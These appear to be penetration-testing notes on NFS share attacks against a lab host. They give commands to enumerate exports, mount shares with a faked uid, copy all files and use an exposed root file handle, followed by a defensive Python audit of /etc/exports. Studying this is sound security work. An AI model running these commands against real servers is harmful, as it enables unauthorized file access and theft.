Recon

Show shares that are open to everyone

showmount -e 10.10.11.78

Show all mounts

showmount -a 10.10.11.78

Analyze the share.
- If nfs3 and the sys auth method are supported, then we can mount and read files (see Force nfs3 and Sys Auth)
- If the root file handle is exposed, we can read every file on the system (see Root file handle exposed)

nfs_analyze 10.10.11.78

Mount

Mount on local machine

sudo mount -t nfs 10.10.11.78:<EXPORT_PATH> ./nfs/ -o nolock

Force nfs3

Force nfs3 and mount (faking a uid to read files requires the sys auth method)

sudo mount -t nfs -o vers=3 10.10.11.78:<EXPORT_PATH> ./nfs/ -o nolock

Sys Auth

Mount with a fake uid

sudo fuse_nfs /mnt 10.10.11.78 --fake-uid --allow-write --export <EXPORT_PATH>

Copy all files

sudo cp -r /mnt/ ./
sudo chown -R kali:kali ./mnt

Root file handle exposed

Mount with a fake uid and a manually supplied file handle

sudo fuse_nfs /mnt 10.10.11.78 --fake-uid --allow-write --manual-fs <FILE_HANDLE>
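
Server-side counterpart to the recon checks above, as an added example (not part of the original notes or of any tool named here): it audits /etc/exports text for entries open to every host and for entries where the sys auth method lets a client-supplied uid be trusted. The sample exports, the issue labels and the function name are constructed; it assumes one export per line with no quoted paths or line continuations.

```python
import re

# Constructed sample /etc/exports content (not from the page or any real host).
SAMPLE_EXPORTS = """\
/srv/public   *(rw,sync)
/srv/backups  192.0.2.0/24(ro,sec=krb5p) *(ro,all_squash)
/srv/home     10.0.0.5(rw,sec=sys:krb5)   # mixed flavors still allow sys
/srv/kerb     *.corp.example(rw,sec=krb5i,all_squash)
"""

# One client entry: optional host pattern followed by optional (options).
CLIENT = re.compile(r"([^\s()]*)(?:\(([^)]*)\))?")


def audit_exports(text):
    """Return (path, client, issues) for each export entry with a weak setting."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        path, *clients = line.split()
        for token in clients:
            m = CLIENT.fullmatch(token)
            if m is None:
                continue  # malformed entry, skip it
            host = m.group(1) or "*"  # a bare "(opts)" applies to every host
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            flavors = {"sys"}  # exports(5): sec= defaults to sys
            for o in opts:
                if o.startswith("sec="):
                    flavors = set(o[4:].split(":"))  # colon-separated list
            issues = []
            if host == "*":
                issues.append("world")  # listed for everyone by showmount -e
            if "sys" in flavors and "all_squash" not in opts:
                issues.append("auth_sys_uid_trusted")  # a faked uid is honored
            if issues and "rw" in opts:
                issues.append("writable")
            if issues:
                findings.append((path, host, issues))
    return findings


if __name__ == "__main__":
    for path, host, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:14} {host:16} {', '.join(issues)}")
```

Entries it reports are candidates for a restricted client list, a Kerberos sec= flavor, or all_squash.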